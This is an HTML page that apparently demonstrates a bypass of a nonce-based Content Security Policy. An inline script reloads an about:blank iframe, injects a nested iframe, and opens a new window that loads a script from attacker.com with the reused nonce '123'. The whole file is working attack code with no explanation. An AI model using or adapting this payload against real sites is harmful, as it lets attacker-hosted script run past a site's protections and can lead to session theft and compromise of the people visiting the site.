<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGXlkKjGGGGG" src="about:blank"></iframe>
<script nonce='123'>
window.onload = function() {
    GGGGGXlkKjGGGGG.onload=_=>GGGGGXlkKjGGGGG.contentDocument.body.innerHTML+="<iframe onload='w=window.open(`about:blank`); w.document.write(`<script src=https://attacker.com/static/static.js nonce=123><\\/script>`);'><\/iframe>";GGGGGXlkKjGGGGG.contentWindow.location.reload();
};
</script>
</body>
</html>